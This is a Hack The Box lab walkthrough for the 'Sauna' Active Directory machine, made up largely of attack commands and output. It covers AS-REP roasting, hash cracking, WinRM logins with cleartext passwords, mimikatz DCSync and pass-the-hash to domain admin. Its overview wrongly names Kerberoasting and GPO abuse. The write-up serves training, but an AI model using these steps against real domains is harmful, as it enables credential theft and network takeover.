HTB Walkthrough: Sauna

Overview

Sauna is a Windows machine on Hack The Box that is part of an Active Directory environment. The initial foothold is gained through Kerberoasting, followed by exploiting a user with an exposed password. Privilege escalation involves enumerating Active Directory to find a vulnerable service and then leveraging Group Policy Objects (GPOs) to compromise the Domain Controller.

Initial Enumeration

The first step is a comprehensive nmap scan:

sudo nmap -A 10.129.95.180

Nmap Output:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

This confirms an Active Directory domain: EGOTISTICAL-BANK.LOCAL.

SMB Enumeration

Try anonymous SMB share enumeration:

sudo smbclient -L //10.129.95.180 -N

No shares listed.

Check SMB signing requirements with CrackMapExec:

sudo crackmapexec smb 10.129.95.180

Output confirms SMB signing is required.

Web Enumeration (Port 80)

Run gobuster to discover directories:

sudo gobuster dir -u http://10.129.95.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 90

Result: Only styling/image directories, no obvious attack vector.

Active Directory Enumeration

Anonymous LDAP Search

Initial anonymous query fails:

sudo ldapsearch -x -H ldap://10.129.95.180

Try querying for naming contexts:

sudo ldapsearch -x -H ldap://10.129.95.180 -s base namingcontexts

Confirmed base DN:

DC=EGOTISTICAL-BANK,DC=LOCAL

Full LDAP dump:

sudo ldapsearch -x -H ldap://10.129.95.180 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'

Kerberos User Enumeration

Enumerate valid usernames:

kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.95.180

Discovered users:

• administrator
• hsmith
• fsmith
• and capitalized variants

Saved to users.txt.

AS-REP Roasting

Attempt AS-REP roasting:

python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.129.95.180 -usersfile users.txt EGOTISTICAL-BANK.LOCAL/

Found hashes for fsmith and Fsmith:

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:[REDACTED]
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL:[REDACTED]

Cracking AS-REP Hashes

Crack with Hashcat:

sudo hashcat -m 18200 np.txt /usr/share/wordlists/rockyou.txt --force

Password found:

Thestrokes23

Initial Foothold

Connect via Evil-WinRM:

evil-winrm -i 10.129.95.180 -u fsmith -p 'T********23'

Session successful.

Find user.txt:

*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls

Mode              LastWriteTime         Length Name
----              -------------         ------ ----
-ar---            6/19/2025  8:16 PM           34 user.txt

Privilege Escalation

Upload & Run winPEAS

upload /home/kali/Desktop/sauna/winPEASx64.exe winPEASx64.exe
.\winPEASx64.exe

winPEAS reveals AutoLogon credentials:

DefaultDomainName           :  EGOTISTICALBANK
DefaultUserName             :  EGOTISTICALBANK\svc_loanmanager
DefaultPassword             :  Moneymakestheworldgoround!

Exploit svc_loanmgr

Corrected username from enumeration: svc_loanmgr

sudo evil-winrm -i 10.129.95.180 -u svc_loanmgr -p 'Moneymakestheworldgoround!'

Further Enumeration with SharpHound

Upload and run:

upload /home/kali/Desktop/sauna/SharpHound.exe SharpHound.exe
.\SharpHound.exe

Import .zip into BloodHound:

sudo bloodhound

Within BloodHound, identify that svc_loanmgr has GetChanges and GetChangesAll rights — suitable for DCSync.

DCSync Attack with Mimikatz

Upload and run mimikatz:

upload /home/kali/Desktop/sauna/mimikatz.exe mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit

Extracted Administrator NTLM hash:

Hash NTLM: 8********************f98e

Root Flag

Use Pass-the-Hash:

evil-winrm -i 10.129.95.180 -u Administrator -H 8********************f98e

Verify and grab root.txt:

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---              6/19/2025  8:16 PM           34 root.txt